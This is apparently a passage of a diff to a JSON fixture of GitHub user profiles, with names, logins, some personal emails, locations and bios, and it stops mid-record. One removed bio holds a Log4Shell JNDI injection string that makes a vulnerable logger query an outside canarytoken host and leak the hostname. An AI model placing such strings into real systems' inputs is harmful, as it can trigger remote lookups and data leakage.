"https://avatars.githubusercontent.com/u/8347164?v=4", - "company": "@Intel", - "location": "Seattle, USA", + "nest_created_at": "2024-09-22T08:38:50.899Z", + "nest_updated_at": "2024-09-22T19:23:34.119Z", + "name": "Chamin Wickramarathna", + "login": "ChaminW", + "email": "chamin.13@cse.mrt.ac.lk", + "avatar_url": "https://avatars.githubusercontent.com/u/13014405?v=4", + "company": "SyscoLabs", + "location": "Sri Lanka", "collaborators_count": 0, - "following_count": 8, - "followers_count": 22, - "public_gists_count": 1, - "public_repositories_count": 39, - "created_at": "2014-08-04T03:24:09Z", - "updated_at": "2024-07-08T16:40:09Z", - "node_id": "MDQ6VXNlcjgzNDcxNjQ=", - "bio": "", - "is_hireable": false, - "twitter_username": "irisdingbj" + "following_count": 17, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 54, + "created_at": "2015-06-23T08:48:56Z", + "updated_at": "2024-09-20T11:37:11Z", + "node_id": "MDQ6VXNlcjEzMDE0NDA1", + "bio": "Full-stack Software Engineer. Currently living in Colombo, Sri Lanka.", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1763, + "pk": 7061, "fields": { - "nest_created_at": "2024-09-12T00:26:08.655Z", - "nest_updated_at": "2024-09-12T01:25:20.786Z", - "name": "", - "login": "ParthibanSG", + "nest_created_at": "2024-09-22T08:38:51.220Z", + "nest_updated_at": "2024-09-22T19:23:34.468Z", + "name": "Frédéric Pierret", + "login": "fepitre", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56960979?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26125607?v=4", "company": "", - "location": "", + "location": "France", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-10-24T10:48:10Z", - "updated_at": "2023-02-17T16:44:18Z", - "node_id": "MDQ6VXNlcjU2OTYwOTc5", - "bio": "", - "is_hireable": false, + "following_count": 18, + "followers_count": 113, + "public_gists_count": 17, + "public_repositories_count": 299, + "created_at": "2017-03-01T22:02:00Z", + "updated_at": "2024-07-25T13:58:13Z", + "node_id": "MDQ6VXNlcjI2MTI1NjA3", + "bio": "PhD in Applied Mathematics for Astronomy and Physics\r\n\r\nPGP: 77EE EF6D 0386 962A EA8C F84A 9B82 73F8 0AC2 19E6\r\n\r\nMember of @QubesOS and @InvisibleThingsLab", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1764, + "pk": 7062, "fields": { - "nest_created_at": "2024-09-12T00:26:09.910Z", - "nest_updated_at": "2024-09-12T00:26:09.910Z", - "name": "Kristina Devochko", - "login": "guidemetothemoon", + "nest_created_at": "2024-09-22T08:38:51.551Z", + "nest_updated_at": "2024-09-22T19:23:34.793Z", + "name": "Gus", + "login": "AlwaysSayingPleaseAndThankYou", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47773700?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16791636?v=4", "company": "", - "location": "Norway", + "location": "", "collaborators_count": 0, - "following_count": 42, - "followers_count": 82, + "following_count": 5, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 39, - "created_at": "2019-02-19T08:13:25Z", - "updated_at": "2024-09-08T10:02:55Z", - "node_id": "MDQ6VXNlcjQ3NzczNzAw", - "bio": "Hey, I'm Kris and I like to code, put cat pictures in presentations and do cloud native makeover to applications 😼", + "public_repositories_count": 22, + "created_at": "2016-01-20T05:00:25Z", + "updated_at": "2023-12-25T18:20:16Z", + "node_id": "MDQ6VXNlcjE2NzkxNjM2", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1765, + "pk": 7063, "fields": { - "nest_created_at": "2024-09-12T00:26:11.098Z", - "nest_updated_at": "2024-09-12T00:26:11.098Z", - "name": "Juho Forsén", - "login": "jupenur", + "nest_created_at": "2024-09-22T08:38:51.867Z", + "nest_updated_at": "2024-09-22T19:29:21.718Z", + "name": "Ikko Eltociear Ashimine", + "login": "eltociear", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3514914?v=4", - "company": "@mattermost ", - "location": "Turku, Finland", + "avatar_url": "https://avatars.githubusercontent.com/u/22633385?v=4", + "company": "@bandism ", + "location": "Tokyo, Japan", "collaborators_count": 0, "following_count": 0, - "followers_count": 32, - "public_gists_count": 3, - "public_repositories_count": 27, - "created_at": "2013-02-08T21:33:17Z", - "updated_at": "2024-08-26T11:25:07Z", - "node_id": "MDQ6VXNlcjM1MTQ5MTQ=", - "bio": "", + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 5166, + "created_at": "2016-10-05T07:58:42Z", + "updated_at": "2024-09-19T18:22:35Z", + "node_id": "MDQ6VXNlcjIyNjMzMzg1", + "bio": "I'm Ikko E. Ashimine (安次嶺 エルトシア 一功) ! Ex-developer @ Tokyo.\r\n\r\nLoves 🎸/🐈/🍛/🏝/⛰", "is_hireable": false, - "twitter_username": "" + "twitter_username": "eltociear" } }, { "model": "github.user", - "pk": 1766, + "pk": 7064, "fields": { - "nest_created_at": "2024-09-12T00:26:14.779Z", - "nest_updated_at": "2024-09-12T00:26:14.779Z", - "name": "", - "login": "umbertooo", + "nest_created_at": "2024-09-22T08:38:52.184Z", + "nest_updated_at": "2024-09-22T19:23:35.469Z", + "name": "Sankalp Piratla", + "login": "BlackBox712", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11329874?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42578043?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2015-03-05T09:47:51Z", - "updated_at": "2024-08-27T14:20:26Z", - "node_id": "MDQ6VXNlcjExMzI5ODc0", + "public_repositories_count": 6, + "created_at": "2018-08-21T13:42:57Z", + "updated_at": "2021-04-16T16:20:16Z", + "node_id": "MDQ6VXNlcjQyNTc4MDQz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404403,99 +662527,99 @@ }, { "model": "github.user", - "pk": 1767, + "pk": 7065, "fields": { - "nest_created_at": "2024-09-12T00:26:16.008Z", - "nest_updated_at": "2024-09-12T00:26:16.009Z", - "name": "Kaj Hejer", - "login": "kajh", - "email": "kaj.hejer@usit.uio.no", - "avatar_url": "https://avatars.githubusercontent.com/u/2808619?v=4", - "company": "University of Oslo", - "location": "Oslo, Norway", + "nest_created_at": "2024-09-22T08:38:52.498Z", + "nest_updated_at": "2024-09-22T19:23:35.792Z", + "name": "SubaruSama", + "login": "SubaruSama", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4934647?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 45, + "followers_count": 19, "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2012-11-15T22:13:21Z", - "updated_at": "2024-08-31T11:21:25Z", - "node_id": "MDQ6VXNlcjI4MDg2MTk=", - "bio": "", - "is_hireable": false, + "public_repositories_count": 49, + "created_at": "2013-07-04T00:42:43Z", + "updated_at": "2024-08-31T18:05:55Z", + "node_id": "MDQ6VXNlcjQ5MzQ2NDc=", + "bio": "Floating around the cyberspace. If you have stopped by, take a seat and enjoy the view.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1768, + "pk": 7066, "fields": { - "nest_created_at": "2024-09-12T00:26:18.099Z", - "nest_updated_at": "2024-09-12T00:26:18.099Z", - "name": "", - "login": "TheRealArlie", + "nest_created_at": "2024-09-22T08:38:52.818Z", + "nest_updated_at": "2024-09-22T19:23:36.103Z", + "name": "Tharaka Udayanga ", + "login": "tharudaya", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33481096?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42183861?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-11-08T09:18:29Z", - "updated_at": "2023-08-31T07:04:39Z", - "node_id": "MDQ6VXNlcjMzNDgxMDk2", - "bio": "", + "public_repositories_count": 28, + "created_at": "2018-08-07T16:52:22Z", + "updated_at": "2024-08-18T17:10:54Z", + "node_id": "MDQ6VXNlcjQyMTgzODYx", + "bio": "Software Engineer\r\n@Wiley", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1769, + "pk": 7067, "fields": { - "nest_created_at": "2024-09-12T00:26:19.313Z", - "nest_updated_at": "2024-09-12T00:26:19.313Z", - "name": "Edgar Molina", - "login": "edgarmolina2", + "nest_created_at": "2024-09-22T08:38:53.165Z", + "nest_updated_at": "2024-09-22T19:23:36.456Z", + "name": "Vishwa", + "login": "v1shwa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3603252?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5007227?v=4", "company": "", - "location": "", + "location": "Hyderabad", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2013-02-15T14:43:28Z", - "updated_at": "2023-05-31T03:15:21Z", - "node_id": "MDQ6VXNlcjM2MDMyNTI=", - "bio": "", + "following_count": 176, + "followers_count": 38, + "public_gists_count": 27, + "public_repositories_count": 55, + "created_at": "2013-07-14T14:32:57Z", + "updated_at": "2024-02-20T04:35:03Z", + "node_id": "MDQ6VXNlcjUwMDcyMjc=", + "bio": "Machine Learning Engineer 🤖", "is_hireable": false, - "twitter_username": "" + "twitter_username": "v1shwa" } }, { "model": "github.user", - "pk": 1770, + "pk": 7068, "fields": { - "nest_created_at": "2024-09-12T00:26:21.789Z", - "nest_updated_at": "2024-09-12T00:26:21.789Z", + "nest_created_at": "2024-09-22T08:38:53.483Z", + "nest_updated_at": "2024-09-22T19:23:36.775Z", "name": "", - "login": "mgmgithubtest", + "login": "mossbanay", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42068227?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2216177?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-08-03T13:26:49Z", - "updated_at": "2024-01-11T18:01:10Z", - "node_id": "MDQ6VXNlcjQyMDY4MjI3", + "following_count": 5, + "followers_count": 25, + "public_gists_count": 6, + "public_repositories_count": 44, + "created_at": "2012-08-25T06:41:55Z", + "updated_at": "2024-08-31T08:21:03Z", + "node_id": "MDQ6VXNlcjIyMTYxNzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404503,24 +662627,24 @@ }, { "model": "github.user", - "pk": 1771, + "pk": 7069, "fields": { - "nest_created_at": "2024-09-12T00:26:22.618Z", - "nest_updated_at": "2024-09-12T00:26:22.618Z", - "name": "", - "login": "dnegi-art", + "nest_created_at": "2024-09-22T08:38:53.799Z", + "nest_updated_at": "2024-09-22T19:23:37.102Z", + "name": "Mohit Dhote", + "login": "mohitd404", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/74643064?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/146939900?v=4", "company": "", - "location": "", + "location": "India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-11-18T06:03:10Z", - "updated_at": "2024-08-11T12:07:20Z", - "node_id": "MDQ6VXNlcjc0NjQzMDY0", + "public_repositories_count": 64, + "created_at": "2023-10-04T10:06:33Z", + "updated_at": "2024-09-01T16:20:02Z", + "node_id": "U_kgDOCMIf_A", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404528,99 +662652,99 @@ }, { "model": "github.user", - "pk": 1772, + "pk": 7070, "fields": { - "nest_created_at": "2024-09-12T00:26:23.815Z", - "nest_updated_at": "2024-09-12T00:26:23.815Z", - "name": "", - "login": "pmccabe-ch", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68948075?v=4", + "nest_created_at": "2024-09-22T08:38:54.133Z", + "nest_updated_at": "2024-09-22T19:23:37.413Z", + "name": "Sourav", + "login": "rmad17", + "email": "souravbasu17@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2450047?v=4", "company": "", - "location": "", + "location": "Bangalore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-07-29T09:32:38Z", - "updated_at": "2023-05-04T12:30:14Z", - "node_id": "MDQ6VXNlcjY4OTQ4MDc1", - "bio": "", - "is_hireable": false, + "following_count": 193, + "followers_count": 39, + "public_gists_count": 13, + "public_repositories_count": 81, + "created_at": "2012-09-29T03:11:50Z", + "updated_at": "2024-09-02T09:14:04Z", + "node_id": "MDQ6VXNlcjI0NTAwNDc=", + "bio": "Architect, Pythonista, Solutions Provider", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1773, + "pk": 7071, "fields": { - "nest_created_at": "2024-09-12T00:26:25.033Z", - "nest_updated_at": "2024-09-12T00:26:25.033Z", - "name": "Santhosh Murthy", - "login": "santhoshmurthybk", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50907223?v=4", + "nest_created_at": "2024-09-22T08:38:54.449Z", + "nest_updated_at": "2024-09-22T19:23:37.723Z", + "name": "", + "login": "stefins", + "email": "stefin@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/28928206?v=4", "company": "", - "location": "Bangalore, IN", + "location": "PID 1", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2019-05-22T08:57:14Z", - "updated_at": "2023-06-09T11:35:33Z", - "node_id": "MDQ6VXNlcjUwOTA3MjIz", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 23, + "followers_count": 24, + "public_gists_count": 4, + "public_repositories_count": 36, + "created_at": "2017-05-24T15:21:48Z", + "updated_at": "2024-09-05T07:43:11Z", + "node_id": "MDQ6VXNlcjI4OTI4MjA2", + "bio": "Wanderer, Autodidact", + "is_hireable": true, + "twitter_username": "stef1ns" } }, { "model": "github.user", - "pk": 1774, + "pk": 7072, "fields": { - "nest_created_at": "2024-09-12T00:26:25.847Z", - "nest_updated_at": "2024-09-12T00:26:25.847Z", - "name": "Jonathan Leitschuh", - "login": "JLLeitschuh", - "email": "jonathan.leitschuh@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", - "company": "@chainguard-dev ", - "location": "Boston, MA", + "nest_created_at": "2024-09-22T08:39:31.624Z", + "nest_updated_at": "2024-09-22T19:24:15.593Z", + "name": "whokilleddb", + "login": "whokilleddb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56482137?v=4", + "company": "", + "location": "Kolkata", "collaborators_count": 0, - "following_count": 72, - "followers_count": 750, - "public_gists_count": 33, - "public_repositories_count": 1534, - "created_at": "2012-01-12T04:25:37Z", - "updated_at": "2024-07-26T20:30:12Z", - "node_id": "MDQ6VXNlcjEzMjM3MDg=", - "bio": "Software Engineer & Security Researcher;\r\n\r\nFirst Dan Kaminsky Fellow @ HUMAN Security;\r\n\r\n${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytoken", + "following_count": 25, + "followers_count": 115, + "public_gists_count": 10, + "public_repositories_count": 93, + "created_at": "2019-10-12T15:20:27Z", + "updated_at": "2024-09-18T09:11:16Z", + "node_id": "MDQ6VXNlcjU2NDgyMTM3", + "bio": "The funny lines I call code.", "is_hireable": false, - "twitter_username": "JLLeitschuh" + "twitter_username": "whokilleddb" } }, { "model": "github.user", - "pk": 1775, + "pk": 7073, "fields": { - "nest_created_at": "2024-09-12T00:26:27.047Z", - "nest_updated_at": "2024-09-12T01:12:03.961Z", - "name": "Damien Carol", - "login": "damiencarol", - "email": "damien.carol@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1694940?v=4", + "nest_created_at": "2024-09-22T08:39:33.202Z", + "nest_updated_at": "2024-09-22T19:24:17.171Z", + "name": "", + "login": "gaurav618618", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29380890?v=4", "company": "", - "location": "Paris, France", + "location": "india", "collaborators_count": 0, - "following_count": 5, - "followers_count": 28, - "public_gists_count": 2, - "public_repositories_count": 66, - "created_at": "2012-05-01T08:51:22Z", - "updated_at": "2024-08-31T09:18:37Z", - "node_id": "MDQ6VXNlcjE2OTQ5NDA=", + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2017-06-12T16:43:03Z", + "updated_at": "2024-01-31T13:56:07Z", + "node_id": "MDQ6VXNlcjI5MzgwODkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404628,74 +662752,74 @@ }, { "model": "github.user", - "pk": 1776, + "pk": 7074, "fields": { - "nest_created_at": "2024-09-12T00:26:28.294Z", - "nest_updated_at": "2024-09-12T00:26:28.294Z", - "name": "Jean-Paul Thorne", - "login": "JPThorne", + "nest_created_at": "2024-09-22T08:39:34.212Z", + "nest_updated_at": "2024-09-22T19:24:18.113Z", + "name": "Madhav Mehndiratta", + "login": "madhavmehndiratta", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1411816?v=4", - "company": "Kingmakers", - "location": "Cape Town, South Africa", + "avatar_url": "https://avatars.githubusercontent.com/u/43489174?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 9, - "followers_count": 5, + "following_count": 23, + "followers_count": 60, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2012-02-06T08:12:08Z", - "updated_at": "2024-09-05T09:40:14Z", - "node_id": "MDQ6VXNlcjE0MTE4MTY=", - "bio": "", + "public_repositories_count": 28, + "created_at": "2018-09-22T04:53:54Z", + "updated_at": "2024-09-22T18:10:28Z", + "node_id": "MDQ6VXNlcjQzNDg5MTc0", + "bio": "Security Engineering | Devops", "is_hireable": false, - "twitter_username": "Jean_PaulThorne" + "twitter_username": "0xMadhav" } }, { "model": "github.user", - "pk": 1777, + "pk": 7075, "fields": { - "nest_created_at": "2024-09-12T00:26:31.155Z", - "nest_updated_at": "2024-09-12T00:26:31.155Z", - "name": "Arthur Degen-Knifton", - "login": "artdk", + "nest_created_at": "2024-09-22T08:39:34.525Z", + "nest_updated_at": "2024-09-22T19:24:18.424Z", + "name": "Sankalpa Acharya", + "login": "Sankalpa-Acharya", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14308935?v=4", - "company": "@PicnicSupermarket ", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/79009768?v=4", + "company": "@breaking-branches", + "location": "Butwal", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-09-16T08:10:58Z", - "updated_at": "2024-08-20T09:21:13Z", - "node_id": "MDQ6VXNlcjE0MzA4OTM1", - "bio": "", + "following_count": 14, + "followers_count": 26, + "public_gists_count": 2, + "public_repositories_count": 31, + "created_at": "2021-02-13T13:18:05Z", + "updated_at": "2024-09-18T12:22:06Z", + "node_id": "MDQ6VXNlcjc5MDA5NzY4", + "bio": "idk\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sankalpa_02" } }, { "model": "github.user", - "pk": 1778, + "pk": 7076, "fields": { - "nest_created_at": "2024-09-12T00:26:32.395Z", - "nest_updated_at": "2024-09-12T00:26:32.395Z", + "nest_created_at": "2024-09-22T08:39:35.154Z", + "nest_updated_at": "2024-09-22T19:24:19.060Z", "name": "", - "login": "tyaps", + "login": "Ephrema77", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5087661?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29904722?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2013-07-25T08:26:06Z", - "updated_at": "2024-08-29T11:00:02Z", - "node_id": "MDQ6VXNlcjUwODc2NjE=", + "public_repositories_count": 4, + "created_at": "2017-07-05T00:19:13Z", + "updated_at": "2024-04-12T09:41:46Z", + "node_id": "MDQ6VXNlcjI5OTA0NzIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404703,124 +662827,124 @@ }, { "model": "github.user", - "pk": 1779, + "pk": 7077, "fields": { - "nest_created_at": "2024-09-12T00:26:33.678Z", - "nest_updated_at": "2024-09-12T00:26:33.678Z", - "name": "Umang Desai", - "login": "udplume", - "email": "udesai@plume.com", - "avatar_url": "https://avatars.githubusercontent.com/u/49769547?v=4", - "company": "", + "nest_created_at": "2024-09-22T08:39:35.783Z", + "nest_updated_at": "2024-09-22T19:24:19.694Z", + "name": "Justin Perkins", + "login": "JustinDPerkins", + "email": "the.justin.perkins@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/60413733?v=4", + "company": "Trend Micro", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-04-19T00:10:56Z", - "updated_at": "2024-08-12T11:54:23Z", - "node_id": "MDQ6VXNlcjQ5NzY5NTQ3", - "bio": "", + "following_count": 13, + "followers_count": 26, + "public_gists_count": 4, + "public_repositories_count": 30, + "created_at": "2020-01-29T01:00:11Z", + "updated_at": "2024-09-10T18:31:43Z", + "node_id": "MDQ6VXNlcjYwNDEzNzMz", + "bio": "Solution Architect @Trend Micro", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1780, + "pk": 7078, "fields": { - "nest_created_at": "2024-09-12T00:26:34.861Z", - "nest_updated_at": "2024-09-12T00:26:34.861Z", - "name": "", - "login": "ngoclamnn", + "nest_created_at": "2024-09-22T08:39:36.094Z", + "nest_updated_at": "2024-09-22T19:24:20.014Z", + "name": "Liu Peng", + "login": "dealbreaker973", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29177632?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43193113?v=4", "company": "", - "location": "", + "location": "Singapore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 37, - "created_at": "2017-06-04T14:39:39Z", - "updated_at": "2024-08-29T16:10:06Z", - "node_id": "MDQ6VXNlcjI5MTc3NjMy", - "bio": "", + "following_count": 11, + "followers_count": 14, + "public_gists_count": 3, + "public_repositories_count": 39, + "created_at": "2018-09-12T02:19:17Z", + "updated_at": "2024-09-19T01:02:52Z", + "node_id": "MDQ6VXNlcjQzMTkzMTEz", + "bio": "Programmer/Pentester", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1781, + "pk": 7079, "fields": { - "nest_created_at": "2024-09-12T00:26:36.051Z", - "nest_updated_at": "2024-09-12T00:26:36.051Z", - "name": "", - "login": "schnesim", + "nest_created_at": "2024-09-22T08:39:36.430Z", + "nest_updated_at": "2024-09-22T19:24:20.330Z", + "name": "Raunak Asnani", + "login": "imraunn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9362735?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26575175?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2014-10-23T06:49:32Z", - "updated_at": "2024-04-23T11:34:44Z", - "node_id": "MDQ6VXNlcjkzNjI3MzU=", - "bio": "", + "public_repositories_count": 17, + "created_at": "2017-03-21T14:31:54Z", + "updated_at": "2024-08-02T03:07:23Z", + "node_id": "MDQ6VXNlcjI2NTc1MTc1", + "bio": "IIT(ISM) CSE'24 || Competitive Programmer || Full stack developer || Infosec Enthusiast", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1782, + "pk": 7080, "fields": { - "nest_created_at": "2024-09-12T00:26:37.400Z", - "nest_updated_at": "2024-09-12T00:26:37.400Z", - "name": "Chris Adams", - "login": "acdha", - "email": "chris@improbable.org", - "avatar_url": "https://avatars.githubusercontent.com/u/46565?v=4", - "company": "@LibraryOfCongress as cadams@loc.gov; personal projects as chris@improbable.org", - "location": "Washington, DC", + "nest_created_at": "2024-09-22T08:39:36.780Z", + "nest_updated_at": "2024-09-22T19:24:20.644Z", + "name": "Tim Warner", + "login": "timothywarner", + "email": "timothywarner316@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12627911?v=4", + "company": "Pluralsight", + "location": "Nashville, TN", "collaborators_count": 0, - "following_count": 204, - "followers_count": 362, - "public_gists_count": 224, - "public_repositories_count": 201, - "created_at": "2009-01-14T17:02:15Z", - "updated_at": "2024-07-09T12:51:03Z", - "node_id": "MDQ6VXNlcjQ2NTY1", - "bio": "", + "following_count": 6, + "followers_count": 769, + "public_gists_count": 39, + "public_repositories_count": 149, + "created_at": "2015-05-27T14:07:07Z", + "updated_at": "2024-09-20T15:45:02Z", + "node_id": "MDQ6VXNlcjEyNjI3OTEx", + "bio": "Pluralsight/Microsoft Press author, technical trainer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1783, + "pk": 7081, "fields": { - "nest_created_at": "2024-09-12T00:26:38.648Z", - "nest_updated_at": "2024-09-12T00:26:38.648Z", + "nest_created_at": "2024-09-22T08:39:43.451Z", + "nest_updated_at": "2024-09-22T19:24:27.240Z", "name": "", - "login": "EmporioHanzo", + "login": "Nimanita", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6170664?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45235857?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2013-12-12T14:56:36Z", - "updated_at": "2024-06-26T07:06:41Z", - "node_id": "MDQ6VXNlcjYxNzA2NjQ=", + "public_repositories_count": 134, + "created_at": "2018-11-21T14:17:20Z", + "updated_at": "2024-08-13T08:51:50Z", + "node_id": "MDQ6VXNlcjQ1MjM1ODU3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404828,24 +662952,24 @@ }, { "model": "github.user", - "pk": 1784, + "pk": 7082, "fields": { - "nest_created_at": "2024-09-12T00:26:39.430Z", - "nest_updated_at": "2024-09-12T00:26:39.430Z", + "nest_created_at": "2024-09-22T08:39:43.794Z", + "nest_updated_at": "2024-09-22T19:24:27.547Z", "name": "", - "login": "sll552", + "login": "jpralle", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6547809?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2845414?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 7, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2014-01-30T19:59:32Z", - "updated_at": "2024-08-17T11:23:02Z", - "node_id": "MDQ6VXNlcjY1NDc4MDk=", + "public_repositories_count": 6, + "created_at": "2012-11-20T15:33:00Z", + "updated_at": "2023-08-15T07:48:52Z", + "node_id": "MDQ6VXNlcjI4NDU0MTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404853,74 +662977,74 @@ }, { "model": "github.user", - "pk": 1785, + "pk": 7083, "fields": { - "nest_created_at": "2024-09-12T00:26:40.616Z", - "nest_updated_at": "2024-09-12T00:26:40.616Z", - "name": "Carsten Leue", - "login": "CarstenLeue", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7644517?v=4", - "company": "@IBM ", - "location": "Böblingen, Germany", + "nest_created_at": "2024-09-22T08:39:44.110Z", + "nest_updated_at": "2024-09-22T19:24:27.854Z", + "name": "Kamil Nowak", + "login": "nowakkamil", + "email": "nowakkamil@yahoo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/32431302?v=4", + "company": "EQTek", + "location": "Cracow, Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2014-05-20T12:23:13Z", - "updated_at": "2024-08-27T09:14:28Z", - "node_id": "MDQ6VXNlcjc2NDQ1MTc=", - "bio": "", - "is_hireable": false, + "following_count": 6, + "followers_count": 21, + "public_gists_count": 7, + "public_repositories_count": 16, + "created_at": "2017-10-01T10:53:08Z", + "updated_at": "2024-09-04T19:45:31Z", + "node_id": "MDQ6VXNlcjMyNDMxMzAy", + "bio": "• Senior Full-stack .NET Developer at EQTek\r\n\r\n• M.S. in CS, AGH University of Science and Technology\r\n\r\n• B.E. in CS, Cracow University of Technology", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1786, + "pk": 7084, "fields": { - "nest_created_at": "2024-09-12T00:26:41.869Z", - "nest_updated_at": "2024-09-12T00:26:41.869Z", - "name": "Shevek", - "login": "shevek", - "email": "github@anarres.org", - "avatar_url": "https://avatars.githubusercontent.com/u/391350?v=4", - "company": "@CompilerWorks", - "location": "San Francisco, CA", + "nest_created_at": "2024-09-22T08:39:44.743Z", + "nest_updated_at": "2024-09-22T19:24:28.490Z", + "name": "Luis Fernando García", + "login": "lfga98", + "email": "lfgarciauaz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/27646862?v=4", + "company": "", + "location": "Zacatecas,Zacatecas", "collaborators_count": 0, - "following_count": 0, - "followers_count": 161, - "public_gists_count": 1, - "public_repositories_count": 61, - "created_at": "2010-09-08T00:22:22Z", - "updated_at": "2024-08-30T23:16:39Z", - "node_id": "MDQ6VXNlcjM5MTM1MA==", - "bio": "Purveyor of high quality Java code to the discerning open source consumer.", - "is_hireable": true, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": 